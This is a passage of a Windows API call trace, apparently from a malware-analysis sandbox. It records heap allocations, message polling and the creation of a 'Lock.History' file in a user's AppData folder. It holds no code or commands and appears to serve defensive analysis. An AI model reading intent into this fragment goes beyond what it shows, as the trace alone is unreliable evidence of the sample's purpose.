| out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0168.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0168.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.347] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0168.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0168.347] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.History" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.history"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0168.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0168.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0168.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0168.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0168.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0168.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0168.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0168.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0168.351] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0168.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0168.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0168.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0168.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0168.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0168.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0168.371] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0168.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0168.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0168.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0168.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 